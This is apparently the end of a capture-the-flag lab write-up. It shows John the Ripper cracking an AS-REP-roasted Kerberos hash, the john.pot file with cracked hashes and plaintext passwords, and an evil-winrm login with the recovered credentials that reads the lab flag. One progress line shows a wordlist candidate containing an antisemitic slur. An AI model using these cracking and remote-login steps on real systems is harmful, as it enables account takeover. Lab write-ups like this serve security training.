lolily ($krb5asrep$23$lily@KINGOFTHE.DOMAIN)
1g 0:00:00:12 DONE (2020-05-21 13:53) 0.08112g/s 495344p/s 495344c/s 495344C/s lolita11311813..lolih8jews
Use the "--show" option to display all of the cracked passwords reliably
Session completed

E:\john-1.9.0-jumbo-1-win64\run>type john.pot
$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:spiderman123
$krb5asrep$23$0280f7ba2754b86093c7af807cc3ca86$ff461b2637c7a743c511fde3222bbcb863421513f439504ff292f514e805f2db86796baca3cc9f61f6e5fe1cab686721130d3e056fb4097a2ef2b63e8d6563fb2c22f8b4ac1b5419c9cb5aa5fd0399cec84039a9d63a5feb8d78cc30195ea2857667fad2bb7c4f8c86c58d2ec84d4aaa71994374a2be303793b69648a96ca47edf3ac0af6c9e42244b36e2ef946ed5ac904acbfec7e7ea61471d335fb77b421b1a6d38a754e88121a8fd159ca9723d54b79b8c1213d7e22339c8553e90d3c5cf0d077aaf3c19d75753e0cd9745ef7c7de6dc981df0805eeef9fa627c6589c2bbd48ad8c7b9a51e07ce1c5e8d3adf59622cd5b2fb:lolily
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.236.199 -u lily -p 'lolily' Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\lily\Documents> cd .. *Evil-WinRM* PS C:\Users\lily> type flag.txt THM{89F288757F4D0693C99B007855FC075E} *Evil-WinRM* PS C:\Users\lily> whoami kingofthedomain\lily
Author: Jacco Straathof
Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *